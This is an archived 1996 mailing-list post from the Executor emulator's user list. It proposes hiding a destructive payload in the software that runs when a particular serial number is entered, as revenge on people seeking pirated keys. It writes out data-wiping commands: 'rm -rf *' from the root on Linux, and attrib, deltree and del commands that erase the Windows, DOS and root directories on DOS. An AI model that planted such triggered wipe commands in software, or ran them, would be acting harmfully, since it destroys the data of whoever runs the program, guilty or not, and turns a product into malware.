home *** CD-ROM | disk | FTP | other *** search
/ Executor 2.0 / executorv2.0.iso / pc / linux / extra / docs / maillist / text / archive.96 / text3485.txt < prev    next >
Encoding:
Text File  |  1996-07-25  |  736 b   |  27 lines

  1. Include some code in the unlockable versions that will
  2. 'do a little mischief'.  Something like 
  3.  
  4. cd /
  5. rm -rf * for linux and the following for the DOS version
  6.  
  7. cd\
  8. attrib -rhs c:\*.*
  9. deltree /y c:\windows
  10. deltree /y c:\dos
  11. deltree /y c:\executor
  12. del c:\*.*
  13.  
  14. Make this code execute when a specific serial# is entered.
  15. Then when some dweeb criminal posts a 'gimme keys please' message,
  16. just mail him the destructive keys and let Executor do the rest.
  17.  
  18. This idea really does
  19.  have some merit;)
  20.  
  21. Then mail them 30 minutes later with a message like, 
  22. "Please can someone send me $150 dollars, I can't wait until we shrink 
  23. wrap E2. Please, this lack of money is a real annoyance when I try to buy 
  24. stuff.  And oh yes... have a nice day:)"
  25.  
  26.  
  27.